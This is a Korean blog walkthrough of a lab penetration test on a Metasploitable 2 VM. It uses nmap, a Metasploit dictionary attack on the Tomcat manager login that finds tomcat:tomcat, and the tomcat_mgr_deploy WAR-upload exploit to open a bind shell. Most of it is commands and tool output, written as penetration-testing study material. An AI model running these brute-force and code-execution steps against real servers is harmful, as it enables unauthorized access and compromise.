- 사용 시스템
KaliLinux
Metasploitable V2 Linux
(Kali)
- 타겟 시스템의 포트/서비스 버전 확인
# nmap -sV -p 1-65535 192.168.17.134
|
Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-10 18:38 KST Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 96.67% done; ETC: 18:39 (0:00:03 remaining) Nmap scan report for 192.168.17.134 Host is up (0.00069s latency). Not shown: 65505 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 6697/tcp open irc UnrealIRCd (Admin email admin@Metasploitable.LAN) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) 33171/tcp open nlockmgr 1-4 (RPC #100021) 42596/tcp open mountd 1-3 (RPC #100005) 49854/tcp open status 1 (RPC #100024) 59001/tcp open unknown MAC Address: 00:0C:29:FA:DD:2A (VMware) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 156.18 seconds |
|
- 기본 홈페이지 접근
# firefox http://192.168.17.134:8180/ &
- 관리자 페이지
# firefox http://192.168.17.134:8180/manager/html &
(주의) 이 창을 닫지 않는다.
- Tomcat 홈페이지의 관리자 페이지를 가지고 Dictionary Attack 수행
# msfconsole
|
Call trans opt: received. 2-19-98 13:24:18 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.com Trouble managing data? List, sort, group, tag and search your pentest data in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.14.10-dev ] + -- --=[ 1639 exploits - 944 auxiliary - 289 post ] + -- --=[ 472 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > search tomcat Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Tomcat UTF-8 Directory Traversal Vulnerability auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal TrendMicro Data Loss Prevention 5.5 Directory Traversal auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual Apache Struts ClassLoader Manipulation Remote Code Execution exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Novell ZENworks Configuration Management Arbitrary File Upload post/multi/gather/tomcat_gather normal Gather Tomcat Credentials post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration msf > use auxiliary/scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > show options Module options (auxiliary/scanner/http/tomcat_mgr_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no The HTTP password to specify for authentication PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no The HTTP username to specify for authentication USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.17.134 rhosts => 192.168.17.134 msf auxiliary(tomcat_mgr_login) > set rport 8180 rport => 8180 msf auxiliary(tomcat_mgr_login) > exploit [-] 192.168.17.134:8180 - LOGIN FAILED: admin:admin (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:manager (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:role1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:root (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:tomcat (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:s3cret (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:vagrant (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:admin (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:manager (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:role1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:root (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:tomcat (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:s3cret (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: manager:vagrant (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:admin (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:manager (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:role1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:root (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:tomcat (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:s3cret (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: role1:vagrant (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:admin (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:manager (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:role1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:root (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:tomcat (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:s3cret (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:vagrant (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:admin (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:manager (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:role1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:root (Incorrect) [+] 192.168.17.134:8180 - LOGIN SUCCESSFUL: tomcat:tomcat [-] 192.168.17.134:8180 - LOGIN FAILED: both:admin (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: both:manager (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: both:role1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: both:root (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: both:tomcat (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: both:s3cret (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: both:vagrant (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: root:owaspbwa (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: xampp:xampp (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect) [-] 192.168.17.134:8180 - LOGIN FAILED: admin:vagrant (Incorrect) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
|
> ID/PASS : tomcat / tomcat 임을 알아냈다.
- 이전에 띄어둔 관리자 페이지에 ID/PASS 를 입력하여 접속
> 접속 성공
- 하단의 war 파일 업로드 가능한지 확인
> 업로드 취약점
# msfconsole
|
msf > search tomcat Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Tomcat UTF-8 Directory Traversal Vulnerability auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal TrendMicro Data Loss Prevention 5.5 Directory Traversal auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual Apache Struts ClassLoader Manipulation Remote Code Execution exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Novell ZENworks Configuration Management Arbitrary File Upload post/multi/gather/tomcat_gather normal Gather Tomcat Credentials post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration msf > msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set rhost 192.168.17.134 rhost => 192.168.17.134 msf exploit(tomcat_mgr_deploy) > set rport 8180 rport => 8180 msf exploit(tomcat_mgr_deploy) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline msf exploit(tomcat_mgr_deploy) > set payload java/shell/bind_tcp payload => java/shell/bind_tcp msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword tomcat no The password for the specified username HttpUsername tomcat no The username to authenticate as PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.17.134 yes The target address RPORT 8180 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (java/shell/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST 192.168.17.134 no The target address Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > exploit [*] Started bind handler [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 6073 bytes as TZV7fXdHuYfvAcaAX4css9b5emJ.war ... [*] Executing /TZV7fXdHuYfvAcaAX4css9b5emJ/1VCOf4gAD4yRoVxmKiMUtk.jsp... [*] Undeploying TZV7fXdHuYfvAcaAX4css9b5emJ ... [*] Sending stage (2952 bytes) to 192.168.17.134 [*] Command shell session 1 opened (192.168.17.50:35691 -> 192.168.17.134:4444) at 2017-11-10 18:59:13 +0900 hostname metasploitable dir bin dev initrd lost+found nohup.out root sys var boot etc initrd.img media opt sbin tmp vmlinuz cdrom home lib mnt proc srv usr id uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup) which gcc /usr/bin/gcc cd /tmp echo '#include<stdio.h>' > test.c echo 'main() { printf("hello\n"); }' >> test.c gcc -o test test.c ./test hello exit [*] 192.168.17.134 - Command shell session 1 closed. Reason: Died from EOFError msf exploit(tomcat_mgr_deploy) > quit |
|
> tomcat이 서버이므로 bind_tcp
> 관리자의 권한을 얻었으며 gcc가 있는 것을 확인하여 악의적인 코드를 삽입하여 실행 할 수 있다.
'Security > 정보 수집' 카테고리의 다른 글
| 메타스플로잇을 이용하여 윈도우 2008 로그 삭제하기 (0) | 2017.11.10 |
|---|---|
| 메타스플로잇을 사용하여 윈도우즈 시스템 장악하기 (0) | 2017.11.10 |
| 메타스플로잇을 사용하여 사전 파일을 이용한 MySQL 원격 로그인 시도 (0) | 2017.11.09 |
| zenmap을 통해 포트스캔된 정보를 metasploit에서 읽어 들이기 (0) | 2017.11.09 |
| 메타스플로잇 사용법 ( msfconsole ) (0) | 2017.11.09 |
